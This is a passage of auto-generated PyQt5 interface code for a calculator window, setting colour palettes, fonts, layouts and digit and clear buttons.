palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 249, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(215, 202, 98))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(91, 79, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.HighlightedText, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 247, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(176, 255, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 62, 211))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 255, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(189, 247, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(66, 120, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(88, 160, 155))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(121, 128, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 244, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 249, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(215, 202, 98))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(91, 79, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.HighlightedText, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 247, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(176, 255, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(66, 120, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 62, 211))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 255, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(189, 247, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(66, 120, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(88, 160, 155))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(66, 120, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(121, 128, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(66, 120, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 249, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 249, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 120, 215))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(91, 79, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.HighlightedText, brush)
brush = QtGui.QBrush(QtGui.QColor(132, 240, 233))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(176, 255, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
Form.setPalette(palette)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("Calculator_icon.svg.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
Form.setWindowIcon(icon)
self.verticalLayout = QtWidgets.QVBoxLayout(Form)
self.verticalLayout.setObjectName("verticalLayout")
self.operation_history = QtWidgets.QLabel(Form)
self.operation_history.setMinimumSize(QtCore.QSize(0, 25))
self.operation_history.setMaximumSize(QtCore.QSize(16777215, 10))
font = QtGui.QFont()
font.setFamily("MingLiU-ExtB")
font.setPointSize(12)
self.operation_history.setFont(font)
self.operation_history.setText("")
self.operation_history.setObjectName("operation_history")
self.verticalLayout.addWidget(self.operation_history)
self.writing_area = QtWidgets.QTextEdit(Form)
self.writing_area.setEnabled(False)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(50)
sizePolicy.setHeightForWidth(self.writing_area.sizePolicy().hasHeightForWidth())
self.writing_area.setSizePolicy(sizePolicy)
self.writing_area.setMinimumSize(QtCore.QSize(0, 0))
self.writing_area.setMaximumSize(QtCore.QSize(16777215, 85))
self.writing_area.setSizeIncrement(QtCore.QSize(0, 0))
self.writing_area.setBaseSize(QtCore.QSize(0, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(42, 42, 42))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 42, 42))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 42, 42))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 249, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(55, 57, 55))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 42, 42))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 42, 42))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 42, 42))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 249, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(55, 57, 55))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 42, 42))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 42, 42))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 42, 42))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(226, 249, 249))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 120, 215))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Highlight, brush)
self.writing_area.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(37)
font.setKerning(True)
self.writing_area.setFont(font)
self.writing_area.viewport().setProperty("cursor", QtGui.QCursor(QtCore.Qt.OpenHandCursor))
self.writing_area.setMouseTracking(True)
self.writing_area.setFocusPolicy(QtCore.Qt.NoFocus)
self.writing_area.setAccessibleName("")
self.writing_area.setStyleSheet("")
self.writing_area.setObjectName("writing_area")
self.verticalLayout.addWidget(self.writing_area)
self.verticalLayout_5 = QtWidgets.QVBoxLayout()
self.verticalLayout_5.setSpacing(7)
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.horizontalLayout.setContentsMargins(-1, -1, -1, 0)
self.horizontalLayout.setSpacing(5)
self.horizontalLayout.setObjectName("horizontalLayout")
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.verticalLayout_2.setSpacing(0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.clear_line = QtWidgets.QPushButton(Form)
self.clear_line.setMinimumSize(QtCore.QSize(0, 0))
self.clear_line.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.clear_line.setFont(font)
self.clear_line.setIconSize(QtCore.QSize(20, 20))
self.clear_line.setShortcut("")
self.clear_line.setCheckable(False)
self.clear_line.setObjectName("clear_line")
self.verticalLayout_2.addWidget(self.clear_line)
self.seven = QtWidgets.QPushButton(Form)
self.seven.setMinimumSize(QtCore.QSize(0, 0))
self.seven.setMaximumSize(QtCore.QSize(16777215, 68))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Highlight, brush)
self.seven.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.seven.setFont(font)
self.seven.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.seven.setIconSize(QtCore.QSize(20, 20))
self.seven.setShortcut("")
self.seven.setCheckable(False)
self.seven.setObjectName("seven")
self.verticalLayout_2.addWidget(self.seven)
self.four = QtWidgets.QPushButton(Form)
self.four.setMinimumSize(QtCore.QSize(0, 0))
self.four.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.four.setFont(font)
self.four.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.four.setIconSize(QtCore.QSize(20, 20))
self.four.setShortcut("")
self.four.setCheckable(False)
self.four.setObjectName("four")
self.verticalLayout_2.addWidget(self.four)
self.one = QtWidgets.QPushButton(Form)
self.one.setMinimumSize(QtCore.QSize(0, 0))
self.one.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.one.setFont(font)
self.one.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.one.setIconSize(QtCore.QSize(20, 20))
self.one.setShortcut("")
self.one.setCheckable(False)
self.one.setObjectName("one")
self.verticalLayout_2.addWidget(self.one)
self.arti_eksi = QtWidgets.QPushButton(Form)
self.arti_eksi.setMinimumSize(QtCore.QSize(0, 0))
self.arti_eksi.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.arti_eksi.setFont(font)
self.arti_eksi.setIconSize(QtCore.QSize(20, 20))
self.arti_eksi.setShortcut("")
self.arti_eksi.setCheckable(False)
self.arti_eksi.setObjectName("arti_eksi")
self.verticalLayout_2.addWidget(self.arti_eksi)
self.horizontalLayout.addLayout(self.verticalLayout_2)
self.verticalLayout_3 = QtWidgets.QVBoxLayout()
self.verticalLayout_3.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.verticalLayout_3.setSpacing(0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.clear_all = QtWidgets.QPushButton(Form)
self.clear_all.setMinimumSize(QtCore.QSize(0, 0))
self.clear_all.setMaximumSize(QtCore.QSize(16777215, 68))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(101, 196, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(148, 245, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(101, 196, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(148, 245, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(101, 196, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(221, 243, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
self.clear_all.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.clear_all.setFont(font)
self.clear_all.setIconSize(QtCore.QSize(20, 20))
self.clear_all.setShortcut("")
self.clear_all.setCheckable(False)
self.clear_all.setDefault(False)
self.clear_all.setObjectName("clear_all")
self.verticalLayout_3.addWidget(self.clear_all)
self.eight = QtWidgets.QPushButton(Form)
self.eight.setMinimumSize(QtCore.QSize(0, 0))
self.eight.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.eight.setFont(font)
self.eight.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.eight.setIconSize(QtCore.QSize(20, 20))
self.eight.setShortcut("")
self.eight.setCheckable(False)
self.eight.setObjectName("eight")
self.verticalLayout_3.addWidget(self.eight)
self.five = QtWidgets.QPushButton(Form)
self.five.setMinimumSize(QtCore.QSize(0, 0))
self.five.setMaximumSize(QtCore.QSize(16777215, 68))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 52, 52))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(167, 250, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 52, 52))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(167, 250, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(66, 120, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(167, 250, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Highlight, brush)
self.five.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.five.setFont(font)
self.five.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.five.setIconSize(QtCore.QSize(20, 20))
self.five.setShortcut("")
self.five.setCheckable(False)
self.five.setObjectName("five")
self.verticalLayout_3.addWidget(self.five)
self.two = QtWidgets.QPushButton(Form)
self.two.setMinimumSize(QtCore.QSize(0, 0))
self.two.setMaximumSize(QtCore.QSize(16777215, 68))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Highlight, brush)
self.two.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.two.setFont(font)
self.two.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.two.setIconSize(QtCore.QSize(20, 20))
self.two.setShortcut("")
self.two.setCheckable(False)
self.two.setObjectName("two")
self.verticalLayout_3.addWidget(self.two)
self.zero = QtWidgets.QPushButton(Form)
self.zero.setMinimumSize(QtCore.QSize(0, 0))
self.zero.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.zero.setFont(font)
self.zero.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.zero.setIconSize(QtCore.QSize(20, 20))
self.zero.setShortcut("")
self.zero.setCheckable(False)
self.zero.setObjectName("zero")
self.verticalLayout_3.addWidget(self.zero)
self.horizontalLayout.addLayout(self.verticalLayout_3)
self.verticalLayout_4 = QtWidgets.QVBoxLayout()
self.verticalLayout_4.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.verticalLayout_4.setSpacing(0)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.back = QtWidgets.QPushButton(Form)
self.back.setMinimumSize(QtCore.QSize(0, 0))
self.back.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(True)
